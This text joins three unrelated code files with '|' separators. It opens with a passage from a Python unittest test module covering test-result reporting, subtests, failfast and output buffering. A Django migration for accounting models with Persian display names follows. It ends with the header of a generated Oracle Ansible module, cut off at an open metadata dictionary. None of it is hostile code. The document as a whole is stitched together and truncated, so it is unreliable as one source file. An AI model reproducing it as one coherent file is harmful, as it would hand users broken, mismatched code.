# unexpected exception. Contains formatted
# tracebacks instead of sys.exc_info() results."
# ...
# "failures - A list containing 2-tuples of TestCase instances and
# formatted tracebacks. Each tuple represents a test where a failure was
# explicitly signalled using the TestCase.fail*() or TestCase.assert*()
# methods. Contains formatted tracebacks instead
# of sys.exc_info() results."
def test_addSuccess(self):
class Foo(unittest.TestCase):
def test_1(self):
pass
test = Foo('test_1')
result = unittest.TestResult()
result.startTest(test)
result.addSuccess(test)
result.stopTest(test)
self.assertTrue(result.wasSuccessful())
self.assertEqual(len(result.errors), 0)
self.assertEqual(len(result.failures), 0)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
# "addFailure(test, err)"
# ...
# "Called when the test case test signals a failure. err is a tuple of
# the form returned by sys.exc_info(): (type, value, traceback)"
# ...
# "wasSuccessful() - Returns True if all tests run so far have passed,
# otherwise returns False"
# ...
# "testsRun - The total number of tests run so far."
# ...
# "errors - A list containing 2-tuples of TestCase instances and
# formatted tracebacks. Each tuple represents a test which raised an
# unexpected exception. Contains formatted
# tracebacks instead of sys.exc_info() results."
# ...
# "failures - A list containing 2-tuples of TestCase instances and
# formatted tracebacks. Each tuple represents a test where a failure was
# explicitly signalled using the TestCase.fail*() or TestCase.assert*()
# methods. Contains formatted tracebacks instead
# of sys.exc_info() results."
def test_addFailure(self):
class Foo(unittest.TestCase):
def test_1(self):
pass
test = Foo('test_1')
try:
test.fail("foo")
except:
exc_info_tuple = sys.exc_info()
result = unittest.TestResult()
result.startTest(test)
result.addFailure(test, exc_info_tuple)
result.stopTest(test)
self.assertFalse(result.wasSuccessful())
self.assertEqual(len(result.errors), 0)
self.assertEqual(len(result.failures), 1)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
test_case, formatted_exc = result.failures[0]
self.assertIs(test_case, test)
self.assertIsInstance(formatted_exc, str)
# "addError(test, err)"
# ...
# "Called when the test case test raises an unexpected exception err
# is a tuple of the form returned by sys.exc_info():
# (type, value, traceback)"
# ...
# "wasSuccessful() - Returns True if all tests run so far have passed,
# otherwise returns False"
# ...
# "testsRun - The total number of tests run so far."
# ...
# "errors - A list containing 2-tuples of TestCase instances and
# formatted tracebacks. Each tuple represents a test which raised an
# unexpected exception. Contains formatted
# tracebacks instead of sys.exc_info() results."
# ...
# "failures - A list containing 2-tuples of TestCase instances and
# formatted tracebacks. Each tuple represents a test where a failure was
# explicitly signalled using the TestCase.fail*() or TestCase.assert*()
# methods. Contains formatted tracebacks instead
# of sys.exc_info() results."
def test_addError(self):
class Foo(unittest.TestCase):
def test_1(self):
pass
test = Foo('test_1')
try:
raise TypeError()
except:
exc_info_tuple = sys.exc_info()
result = unittest.TestResult()
result.startTest(test)
result.addError(test, exc_info_tuple)
result.stopTest(test)
self.assertFalse(result.wasSuccessful())
self.assertEqual(len(result.errors), 1)
self.assertEqual(len(result.failures), 0)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
test_case, formatted_exc = result.errors[0]
self.assertIs(test_case, test)
self.assertIsInstance(formatted_exc, str)
def test_addError_locals(self):
class Foo(unittest.TestCase):
def test_1(self):
1/0
test = Foo('test_1')
result = unittest.TestResult()
result.tb_locals = True
unittest.result.traceback = MockTraceback
self.addCleanup(restore_traceback)
result.startTestRun()
test.run(result)
result.stopTestRun()
self.assertEqual(len(result.errors), 1)
test_case, formatted_exc = result.errors[0]
self.assertEqual('A tracebacklocals', formatted_exc)
def test_addSubTest(self):
class Foo(unittest.TestCase):
def test_1(self):
nonlocal subtest
with self.subTest(foo=1):
subtest = self._subtest
try:
1/0
except ZeroDivisionError:
exc_info_tuple = sys.exc_info()
# Register an error by hand (to check the API)
result.addSubTest(test, subtest, exc_info_tuple)
# Now trigger a failure
self.fail("some recognizable failure")
subtest = None
test = Foo('test_1')
result = unittest.TestResult()
test.run(result)
self.assertFalse(result.wasSuccessful())
self.assertEqual(len(result.errors), 1)
self.assertEqual(len(result.failures), 1)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
test_case, formatted_exc = result.errors[0]
self.assertIs(test_case, subtest)
self.assertIn("ZeroDivisionError", formatted_exc)
test_case, formatted_exc = result.failures[0]
self.assertIs(test_case, subtest)
self.assertIn("some recognizable failure", formatted_exc)
def testGetDescriptionWithoutDocstring(self):
result = unittest.TextTestResult(None, True, 1)
self.assertEqual(
result.getDescription(self),
'testGetDescriptionWithoutDocstring (' + __name__ +
'.Test_TestResult)')
def testGetSubTestDescriptionWithoutDocstring(self):
with self.subTest(foo=1, bar=2):
result = unittest.TextTestResult(None, True, 1)
self.assertEqual(
result.getDescription(self._subtest),
'testGetSubTestDescriptionWithoutDocstring (' + __name__ +
'.Test_TestResult) (foo=1, bar=2)')
with self.subTest('some message'):
result = unittest.TextTestResult(None, True, 1)
self.assertEqual(
result.getDescription(self._subtest),
'testGetSubTestDescriptionWithoutDocstring (' + __name__ +
'.Test_TestResult) [some message]')
def testGetSubTestDescriptionWithoutDocstringAndParams(self):
with self.subTest():
result = unittest.TextTestResult(None, True, 1)
self.assertEqual(
result.getDescription(self._subtest),
'testGetSubTestDescriptionWithoutDocstringAndParams '
'(' + __name__ + '.Test_TestResult) (<subtest>)')
def testGetSubTestDescriptionForFalsyValues(self):
expected = 'testGetSubTestDescriptionForFalsyValues (%s.Test_TestResult) [%s]'
result = unittest.TextTestResult(None, True, 1)
for arg in [0, None, []]:
with self.subTest(arg):
self.assertEqual(
result.getDescription(self._subtest),
expected % (__name__, arg)
)
def testGetNestedSubTestDescriptionWithoutDocstring(self):
with self.subTest(foo=1):
with self.subTest(baz=2, bar=3):
result = unittest.TextTestResult(None, True, 1)
self.assertEqual(
result.getDescription(self._subtest),
'testGetNestedSubTestDescriptionWithoutDocstring '
'(' + __name__ + '.Test_TestResult) (baz=2, bar=3, foo=1)')
def testGetDuplicatedNestedSubTestDescriptionWithoutDocstring(self):
with self.subTest(foo=1, bar=2):
with self.subTest(baz=3, bar=4):
result = unittest.TextTestResult(None, True, 1)
self.assertEqual(
result.getDescription(self._subtest),
'testGetDuplicatedNestedSubTestDescriptionWithoutDocstring '
'(' + __name__ + '.Test_TestResult) (baz=3, bar=4, foo=1)')
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def testGetDescriptionWithOneLineDocstring(self):
"""Tests getDescription() for a method with a docstring."""
result = unittest.TextTestResult(None, True, 1)
self.assertEqual(
result.getDescription(self),
('testGetDescriptionWithOneLineDocstring '
'(' + __name__ + '.Test_TestResult)\n'
'Tests getDescription() for a method with a docstring.'))
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def testGetSubTestDescriptionWithOneLineDocstring(self):
"""Tests getDescription() for a method with a docstring."""
result = unittest.TextTestResult(None, True, 1)
with self.subTest(foo=1, bar=2):
self.assertEqual(
result.getDescription(self._subtest),
('testGetSubTestDescriptionWithOneLineDocstring '
'(' + __name__ + '.Test_TestResult) (foo=1, bar=2)\n'
'Tests getDescription() for a method with a docstring.'))
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def testGetDescriptionWithMultiLineDocstring(self):
"""Tests getDescription() for a method with a longer docstring.
The second line of the docstring.
"""
result = unittest.TextTestResult(None, True, 1)
self.assertEqual(
result.getDescription(self),
('testGetDescriptionWithMultiLineDocstring '
'(' + __name__ + '.Test_TestResult)\n'
'Tests getDescription() for a method with a longer '
'docstring.'))
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def testGetSubTestDescriptionWithMultiLineDocstring(self):
"""Tests getDescription() for a method with a longer docstring.
The second line of the docstring.
"""
result = unittest.TextTestResult(None, True, 1)
with self.subTest(foo=1, bar=2):
self.assertEqual(
result.getDescription(self._subtest),
('testGetSubTestDescriptionWithMultiLineDocstring '
'(' + __name__ + '.Test_TestResult) (foo=1, bar=2)\n'
'Tests getDescription() for a method with a longer '
'docstring.'))
def testStackFrameTrimming(self):
class Frame(object):
class tb_frame(object):
f_globals = {}
result = unittest.TestResult()
self.assertFalse(result._is_relevant_tb_level(Frame))
Frame.tb_frame.f_globals['__unittest'] = True
self.assertTrue(result._is_relevant_tb_level(Frame))
def testFailFast(self):
result = unittest.TestResult()
result._exc_info_to_string = lambda *_: ''
result.failfast = True
result.addError(None, None)
self.assertTrue(result.shouldStop)
result = unittest.TestResult()
result._exc_info_to_string = lambda *_: ''
result.failfast = True
result.addFailure(None, None)
self.assertTrue(result.shouldStop)
result = unittest.TestResult()
result._exc_info_to_string = lambda *_: ''
result.failfast = True
result.addUnexpectedSuccess(None)
self.assertTrue(result.shouldStop)
def testFailFastSetByRunner(self):
stream = BufferedWriter()
runner = unittest.TextTestRunner(stream=stream, failfast=True)
def test(result):
self.assertTrue(result.failfast)
result = runner.run(test)
stream.flush()
self.assertTrue(stream.getvalue().endswith('\n\nOK\n'))
classDict = dict(unittest.TestResult.__dict__)
for m in ('addSkip', 'addExpectedFailure', 'addUnexpectedSuccess',
'__init__'):
del classDict[m]
def __init__(self, stream=None, descriptions=None, verbosity=None):
self.failures = []
self.errors = []
self.testsRun = 0
self.shouldStop = False
self.buffer = False
self.tb_locals = False
classDict['__init__'] = __init__
OldResult = type('OldResult', (object,), classDict)
class Test_OldTestResult(unittest.TestCase):
def assertOldResultWarning(self, test, failures):
with warnings_helper.check_warnings(
("TestResult has no add.+ method,", RuntimeWarning)):
result = OldResult()
test.run(result)
self.assertEqual(len(result.failures), failures)
def testOldTestResult(self):
class Test(unittest.TestCase):
def testSkip(self):
self.skipTest('foobar')
@unittest.expectedFailure
def testExpectedFail(self):
raise TypeError
@unittest.expectedFailure
def testUnexpectedSuccess(self):
pass
for test_name, should_pass in (('testSkip', True),
('testExpectedFail', True),
('testUnexpectedSuccess', False)):
test = Test(test_name)
self.assertOldResultWarning(test, int(not should_pass))
def testOldTestResultSetup(self):
class Test(unittest.TestCase):
def setUp(self):
self.skipTest('no reason')
def testFoo(self):
pass
self.assertOldResultWarning(Test('testFoo'), 0)
def testOldTestResultClass(self):
@unittest.skip('no reason')
class Test(unittest.TestCase):
def testFoo(self):
pass
self.assertOldResultWarning(Test('testFoo'), 0)
def testOldResultWithRunner(self):
class Test(unittest.TestCase):
def testFoo(self):
pass
runner = unittest.TextTestRunner(resultclass=OldResult,
stream=io.StringIO())
# This will raise an exception if TextTestRunner can't handle old
# test result objects
runner.run(Test('testFoo'))
class TestOutputBuffering(unittest.TestCase):
def setUp(self):
self._real_out = sys.stdout
self._real_err = sys.stderr
def tearDown(self):
sys.stdout = self._real_out
sys.stderr = self._real_err
def testBufferOutputOff(self):
real_out = self._real_out
real_err = self._real_err
result = unittest.TestResult()
self.assertFalse(result.buffer)
self.assertIs(real_out, sys.stdout)
self.assertIs(real_err, sys.stderr)
result.startTest(self)
self.assertIs(real_out, sys.stdout)
self.assertIs(real_err, sys.stderr)
def testBufferOutputStartTestAddSuccess(self):
real_out = self._real_out
real_err = self._real_err
result = unittest.TestResult()
self.assertFalse(result.buffer)
result.buffer = True
self.assertIs(real_out, sys.stdout)
self.assertIs(real_err, sys.stderr)
result.startTest(self)
self.assertIsNot(real_out, sys.stdout)
self.assertIsNot(real_err, sys.stderr)
self.assertIsInstance(sys.stdout, io.StringIO)
self.assertIsInstance(sys.stderr, io.StringIO)
self.assertIsNot(sys.stdout, sys.stderr)
out_stream = sys.stdout
err_stream = sys.stderr
result._original_stdout = io.StringIO()
result._original_stderr = io.StringIO()
print('foo')
print('bar', file=sys.stderr)
self.assertEqual(out_stream.getvalue(), 'foo\n')
self.assertEqual(err_stream.getvalue(), 'bar\n')
self.assertEqual(result._original_stdout.getvalue(), '')
self.assertEqual(result._original_stderr.getvalue(), '')
result.addSuccess(self)
result.stopTest(self)
self.assertIs(sys.stdout, result._original_stdout)
self.assertIs(sys.stderr, result._original_stderr)
self.assertEqual(result._original_stdout.getvalue(), '')
self.assertEqual(result._original_stderr.getvalue(), '')
self.assertEqual(out_stream.getvalue(), '')
self.assertEqual(err_stream.getvalue(), '')
def getStartedResult(self):
result = unittest.TestResult()
result.buffer = True
result.startTest(self)
return result
def testBufferOutputAddErrorOrFailure(self):
unittest.result.traceback = MockTraceback
self.addCleanup(restore_traceback)
for message_attr, add_attr, include_error in [
('errors', 'addError', True),
('failures', 'addFailure', False),
('errors', 'addError', True),
('failures', 'addFailure', False)
]:
result = self.getStartedResult()
buffered_out = sys.stdout
buffered_err = sys.stderr
result._original_stdout = io.StringIO()
result._original_stderr = io.StringIO()
print('foo', file=sys.stdout)
if include_error:
print('bar', file=sys.stderr)
addFunction = getattr(result, add_attr)
addFunction(self, (None, None, None))
result.stopTest(self)
result_list = getattr(result, message_attr)
self.assertEqual(len(result_list), 1)
test, message = result_list[0]
expectedOutMessage = textwrap.dedent("""
Stdout:
foo
""")
expectedErrMessage = ''
if include_error:
expectedErrMessage = textwrap.dedent("""
Stderr:
bar
""")
expectedFullMessage = 'A traceback%s%s' % (expectedOutMessage, expectedErrMessage)
self.assertIs(test, self)
self.assertEqual(result._original_stdout.getvalue(), expectedOutMessage)
self.assertEqual(result._original_stderr.getvalue(), expectedErrMessage)
self.assertMultiLineEqual(message, expectedFullMessage)
def testBufferSetUp(self):
with captured_stdout() as stdout:
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
def setUp(self):
print('set up')
1/0
def test_foo(self):
pass
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
expected_out = '\nStdout:\nset up\n'
self.assertEqual(stdout.getvalue(), expected_out)
self.assertEqual(len(result.errors), 1)
description = f'test_foo ({strclass(Foo)})'
test_case, formatted_exc = result.errors[0]
self.assertEqual(str(test_case), description)
self.assertIn('ZeroDivisionError: division by zero', formatted_exc)
self.assertIn(expected_out, formatted_exc)
def testBufferTearDown(self):
with captured_stdout() as stdout:
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
def tearDown(self):
print('tear down')
1/0
def test_foo(self):
pass
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
expected_out = '\nStdout:\ntear down\n'
self.assertEqual(stdout.getvalue(), expected_out)
self.assertEqual(len(result.errors), 1)
description = f'test_foo ({strclass(Foo)})'
test_case, formatted_exc = result.errors[0]
self.assertEqual(str(test_case), description)
self.assertIn('ZeroDivisionError: division by zero', formatted_exc)
self.assertIn(expected_out, formatted_exc)
def testBufferDoCleanups(self):
with captured_stdout() as stdout:
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
def setUp(self):
print('set up')
self.addCleanup(bad_cleanup1)
self.addCleanup(bad_cleanup2)
def test_foo(self):
pass
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
expected_out = '\nStdout:\nset up\ndo cleanup2\ndo cleanup1\n'
self.assertEqual(stdout.getvalue(), expected_out)
self.assertEqual(len(result.errors), 2)
description = f'test_foo ({strclass(Foo)})'
test_case, formatted_exc = result.errors[0]
self.assertEqual(str(test_case), description)
self.assertIn('ValueError: bad cleanup2', formatted_exc)
self.assertNotIn('TypeError', formatted_exc)
self.assertIn(expected_out, formatted_exc)
test_case, formatted_exc = result.errors[1]
self.assertEqual(str(test_case), description)
self.assertIn('TypeError: bad cleanup1', formatted_exc)
self.assertNotIn('ValueError', formatted_exc)
self.assertIn(expected_out, formatted_exc)
def testBufferSetUp_DoCleanups(self):
with captured_stdout() as stdout:
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
def setUp(self):
print('set up')
self.addCleanup(bad_cleanup1)
self.addCleanup(bad_cleanup2)
1/0
def test_foo(self):
pass
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
expected_out = '\nStdout:\nset up\ndo cleanup2\ndo cleanup1\n'
self.assertEqual(stdout.getvalue(), expected_out)
self.assertEqual(len(result.errors), 3)
description = f'test_foo ({strclass(Foo)})'
test_case, formatted_exc = result.errors[0]
self.assertEqual(str(test_case), description)
self.assertIn('ZeroDivisionError: division by zero', formatted_exc)
self.assertNotIn('ValueError', formatted_exc)
self.assertNotIn('TypeError', formatted_exc)
self.assertIn(expected_out, formatted_exc)
test_case, formatted_exc = result.errors[1]
self.assertEqual(str(test_case), description)
self.assertIn('ValueError: bad cleanup2', formatted_exc)
self.assertNotIn('ZeroDivisionError', formatted_exc)
self.assertNotIn('TypeError', formatted_exc)
self.assertIn(expected_out, formatted_exc)
test_case, formatted_exc = result.errors[2]
self.assertEqual(str(test_case), description)
self.assertIn('TypeError: bad cleanup1', formatted_exc)
self.assertNotIn('ZeroDivisionError', formatted_exc)
self.assertNotIn('ValueError', formatted_exc)
self.assertIn(expected_out, formatted_exc)
def testBufferTearDown_DoCleanups(self):
with captured_stdout() as stdout:
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
def setUp(self):
print('set up')
self.addCleanup(bad_cleanup1)
self.addCleanup(bad_cleanup2)
def tearDown(self):
print('tear down')
1/0
def test_foo(self):
pass
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
expected_out = '\nStdout:\nset up\ntear down\ndo cleanup2\ndo cleanup1\n'
self.assertEqual(stdout.getvalue(), expected_out)
self.assertEqual(len(result.errors), 3)
description = f'test_foo ({strclass(Foo)})'
test_case, formatted_exc = result.errors[0]
self.assertEqual(str(test_case), description)
self.assertIn('ZeroDivisionError: division by zero', formatted_exc)
self.assertNotIn('ValueError', formatted_exc)
self.assertNotIn('TypeError', formatted_exc)
self.assertIn(expected_out, formatted_exc)
test_case, formatted_exc = result.errors[1]
self.assertEqual(str(test_case), description)
self.assertIn('ValueError: bad cleanup2', formatted_exc)
self.assertNotIn('ZeroDivisionError', formatted_exc)
self.assertNotIn('TypeError', formatted_exc)
self.assertIn(expected_out, formatted_exc)
test_case, formatted_exc = result.errors[2]
self.assertEqual(str(test_case), description)
self.assertIn('TypeError: bad cleanup1', formatted_exc)
self.assertNotIn('ZeroDivisionError', formatted_exc)
self.assertNotIn('ValueError', formatted_exc)
self.assertIn(expected_out, formatted_exc)
def testBufferSetupClass(self):
with captured_stdout() as stdout:
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
@classmethod
def setUpClass(cls):
print('set up class')
1/0
def test_foo(self):
pass
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
expected_out = '\nStdout:\nset up class\n'
self.assertEqual(stdout.getvalue(), expected_out)
self.assertEqual(len(result.errors), 1)
description = f'setUpClass ({strclass(Foo)})'
test_case, formatted_exc = result.errors[0]
self.assertEqual(test_case.description, description)
self.assertIn('ZeroDivisionError: division by zero', formatted_exc)
self.assertIn(expected_out, formatted_exc)
def testBufferTearDownClass(self):
with captured_stdout() as stdout:
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
@classmethod
def tearDownClass(cls):
print('tear down class')
1/0
def test_foo(self):
pass
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
expected_out = '\nStdout:\ntear down class\n'
self.assertEqual(stdout.getvalue(), expected_out)
self.assertEqual(len(result.errors), 1)
description = f'tearDownClass ({strclass(Foo)})'
test_case, formatted_exc = result.errors[0]
self.assertEqual(test_case.description, description)
self.assertIn('ZeroDivisionError: division by zero', formatted_exc)
self.assertIn(expected_out, formatted_exc)
def testBufferDoClassCleanups(self):
with captured_stdout() as stdout:
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
@classmethod
def setUpClass(cls):
print('set up class')
cls.addClassCleanup(bad_cleanup1)
cls.addClassCleanup(bad_cleanup2)
@classmethod
def tearDownClass(cls):
print('tear down class')
def test_foo(self):
pass
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
expected_out = '\nStdout:\ntear down class\ndo cleanup2\ndo cleanup1\n'
self.assertEqual(stdout.getvalue(), expected_out)
self.assertEqual(len(result.errors), 2)
description = f'tearDownClass ({strclass(Foo)})'
test_case, formatted_exc = result.errors[0]
self.assertEqual(test_case.description, description)
self.assertIn('ValueError: bad cleanup2', formatted_exc)
self.assertNotIn('TypeError', formatted_exc)
self.assertIn(expected_out, formatted_exc)
test_case, formatted_exc = result.errors[1]
self.assertEqual(test_case.description, description)
self.assertIn('TypeError: bad cleanup1', formatted_exc)
self.assertNotIn('ValueError', formatted_exc)
self.assertIn(expected_out, formatted_exc)
def testBufferSetupClass_DoClassCleanups(self):
with captured_stdout() as stdout:
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
@classmethod
def setUpClass(cls):
print('set up class')
cls.addClassCleanup(bad_cleanup1)
cls.addClassCleanup(bad_cleanup2)
1/0
def test_foo(self):
pass
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
expected_out = '\nStdout:\nset up class\ndo cleanup2\ndo cleanup1\n'
self.assertEqual(stdout.getvalue(), expected_out)
self.assertEqual(len(result.errors), 3)
description = f'setUpClass ({strclass(Foo)})'
test_case, formatted_exc = result.errors[0]
self.assertEqual(test_case.description, description)
self.assertIn('ZeroDivisionError: division by zero', formatted_exc)
self.assertNotIn('ValueError', formatted_exc)
self.assertNotIn('TypeError', formatted_exc)
self.assertIn('\nStdout:\nset up class\n', formatted_exc)
test_case, formatted_exc = result.errors[1]
self.assertEqual(test_case.description, description)
self.assertIn('ValueError: bad cleanup2', formatted_exc)
self.assertNotIn('ZeroDivisionError', formatted_exc)
self.assertNotIn('TypeError', formatted_exc)
self.assertIn(expected_out, formatted_exc)
test_case, formatted_exc = result.errors[2]
self.assertEqual(test_case.description, description)
self.assertIn('TypeError: bad cleanup1', formatted_exc)
self.assertNotIn('ZeroDivisionError', formatted_exc)
self.assertNotIn('ValueError', formatted_exc)
self.assertIn(expected_out, formatted_exc)
def testBufferTearDownClass_DoClassCleanups(self):
with captured_stdout() as stdout:
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
@classmethod
def setUpClass(cls):
print('set up class')
cls.addClassCleanup(bad_cleanup1)
cls.addClassCleanup(bad_cleanup2)
@classmethod
def tearDownClass(cls):
print('tear down class')
1/0
def test_foo(self):
pass
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
expected_out = '\nStdout:\ntear down class\ndo cleanup2\ndo cleanup1\n'
self.assertEqual(stdout.getvalue(), expected_out)
self.assertEqual(len(result.errors), 3)
description = f'tearDownClass ({strclass(Foo)})'
test_case, formatted_exc = result.errors[0]
self.assertEqual(test_case.description, description)
self.assertIn('ZeroDivisionError: division by zero', formatted_exc)
self.assertNotIn('ValueError', formatted_exc)
self.assertNotIn('TypeError', formatted_exc)
self.assertIn('\nStdout:\ntear down class\n', formatted_exc)
test_case, formatted_exc = result.errors[1]
self.assertEqual(test_case.description, description)
self.assertIn('ValueError: bad cleanup2', formatted_exc)
self.assertNotIn('ZeroDivisionError', formatted_exc)
self.assertNotIn('TypeError', formatted_exc)
self.assertIn(expected_out, formatted_exc)
test_case, formatted_exc = result.errors[2]
self.assertEqual(test_case.description, description)
self.assertIn('TypeError: bad cleanup1', formatted_exc)
self.assertNotIn('ZeroDivisionError', formatted_exc)
self.assertNotIn('ValueError', formatted_exc)
self.assertIn(expected_out, formatted_exc)
def testBufferSetUpModule(self):
with captured_stdout() as stdout:
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
def test_foo(self):
pass
class Module(object):
@staticmethod
def setUpModule():
print('set up module')
1/0
Foo.__module__ = 'Module'
sys.modules['Module'] = Module
self.addCleanup(sys.modules.pop, 'Module')
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
expected_out = '\nStdout:\nset up module\n'
self.assertEqual(stdout.getvalue(), expected_out)
self.assertEqual(len(result.errors), 1)
description = 'setUpModule (Module)'
test_case, formatted_exc = result.errors[0]
self.assertEqual(test_case.description, description)
self.assertIn('ZeroDivisionError: division by zero', formatted_exc)
self.assertIn(expected_out, formatted_exc)
def testBufferTearDownModule(self):
with captured_stdout() as stdout:
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
def test_foo(self):
pass
class Module(object):
@staticmethod
def tearDownModule():
print('tear down module')
1/0
Foo.__module__ = 'Module'
sys.modules['Module'] = Module
self.addCleanup(sys.modules.pop, 'Module')
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
expected_out = '\nStdout:\ntear down module\n'
self.assertEqual(stdout.getvalue(), expected_out)
self.assertEqual(len(result.errors), 1)
description = 'tearDownModule (Module)'
test_case, formatted_exc = result.errors[0]
self.assertEqual(test_case.description, description)
self.assertIn('ZeroDivisionError: division by zero', formatted_exc)
self.assertIn(expected_out, formatted_exc)
def testBufferDoModuleCleanups(self):
with captured_stdout() as stdout:
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
def test_foo(self):
pass
class Module(object):
@staticmethod
def setUpModule():
print('set up module')
unittest.addModuleCleanup(bad_cleanup1)
unittest.addModuleCleanup(bad_cleanup2)
Foo.__module__ = 'Module'
sys.modules['Module'] = Module
self.addCleanup(sys.modules.pop, 'Module')
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
expected_out = '\nStdout:\ndo cleanup2\ndo cleanup1\n'
self.assertEqual(stdout.getvalue(), expected_out)
self.assertEqual(len(result.errors), 1)
description = 'tearDownModule (Module)'
test_case, formatted_exc = result.errors[0]
self.assertEqual(test_case.description, description)
self.assertIn('ValueError: bad cleanup2', formatted_exc)
self.assertNotIn('TypeError', formatted_exc)
self.assertIn(expected_out, formatted_exc)
def testBufferSetUpModule_DoModuleCleanups(self):
with captured_stdout() as stdout:
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
def test_foo(self):
pass
class Module(object):
@staticmethod
def setUpModule():
print('set up module')
unittest.addModuleCleanup(bad_cleanup1)
unittest.addModuleCleanup(bad_cleanup2)
1/0
Foo.__module__ = 'Module'
sys.modules['Module'] = Module
self.addCleanup(sys.modules.pop, 'Module')
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
expected_out = '\nStdout:\nset up module\ndo cleanup2\ndo cleanup1\n'
self.assertEqual(stdout.getvalue(), expected_out)
self.assertEqual(len(result.errors), 2)
description = 'setUpModule (Module)'
test_case, formatted_exc = result.errors[0]
self.assertEqual(test_case.description, description)
self.assertIn('ZeroDivisionError: division by zero', formatted_exc)
self.assertNotIn('ValueError', formatted_exc)
self.assertNotIn('TypeError', formatted_exc)
self.assertIn('\nStdout:\nset up module\n', formatted_exc)
test_case, formatted_exc = result.errors[1]
self.assertIn(expected_out, formatted_exc)
self.assertEqual(test_case.description, description)
self.assertIn('ValueError: bad cleanup2', formatted_exc)
self.assertNotIn('ZeroDivisionError', formatted_exc)
self.assertNotIn('TypeError', formatted_exc)
self.assertIn(expected_out, formatted_exc)
def testBufferTearDownModule_DoModuleCleanups(self):
with captured_stdout() as stdout:
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
def test_foo(self):
pass
class Module(object):
@staticmethod
def setUpModule():
print('set up module')
unittest.addModuleCleanup(bad_cleanup1)
unittest.addModuleCleanup(bad_cleanup2)
@staticmethod
def tearDownModule():
print('tear down module')
1/0
Foo.__module__ = 'Module'
sys.modules['Module'] = Module
self.addCleanup(sys.modules.pop, 'Module')
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
expected_out = '\nStdout:\ntear down module\ndo cleanup2\ndo cleanup1\n'
self.assertEqual(stdout.getvalue(), expected_out)
self.assertEqual(len(result.errors), 2)
description = 'tearDownModule (Module)'
test_case, formatted_exc = result.errors[0]
self.assertEqual(test_case.description, description)
self.assertIn('ZeroDivisionError: division by zero', formatted_exc)
self.assertNotIn('ValueError', formatted_exc)
self.assertNotIn('TypeError', formatted_exc)
self.assertIn('\nStdout:\ntear down module\n', formatted_exc)
test_case, formatted_exc = result.errors[1]
self.assertEqual(test_case.description, description)
self.assertIn('ValueError: bad cleanup2', formatted_exc)
self.assertNotIn('ZeroDivisionError', formatted_exc)
self.assertNotIn('TypeError', formatted_exc)
self.assertIn(expected_out, formatted_exc)
if __name__ == '__main__':
unittest.main()
|
# Generated by Django 3.1 on 2020-09-20 19:54
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('app', '0008_auto_20200920_0550'),
('accounting', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
name='bank',
options={'verbose_name': 'Bank', 'verbose_name_plural': 'بانک ها'},
),
migrations.AlterModelOptions(
name='bankaccount',
options={'verbose_name': 'BankAccount', 'verbose_name_plural': 'حساب های بانکی'},
),
migrations.AlterModelOptions(
name='cash',
options={'verbose_name': 'Cash', 'verbose_name_plural': 'صندوق ها'},
),
migrations.AlterModelOptions(
name='currentfeecategory',
options={'verbose_name': 'CurrentFeeCategory', 'verbose_name_plural': 'دسته بندی های هزینه های جاری'},
),
migrations.AlterModelOptions(
name='financialprofile',
options={'verbose_name': 'FinancialProfile', 'verbose_name_plural': 'پروفایل ها مالی'},
),
migrations.AlterModelOptions(
name='financialtransaction',
options={'verbose_name': 'FinancialTransaction', 'verbose_name_plural': 'تراکنش های مالی'},
),
migrations.AlterModelOptions(
name='financialyear',
options={'verbose_name': 'FinancialYear', 'verbose_name_plural': 'سال های مالی'},
),
migrations.AddField(
model_name='bankaccount',
name='owner',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, to='app.profile', verbose_name='صاحب حساب'),
),
]
|
#!/usr/bin/python
# Copyright (c) 2020, 2022 Oracle and/or its affiliates.
# This software is made available to you under the terms of the GPL 3.0 license or the Apache 2.0 license.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Apache License v2.0
# See LICENSE.TXT for details.
# GENERATED FILE - DO NOT EDIT - MANUAL CHANGES WILL BE OVERWRITTEN
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
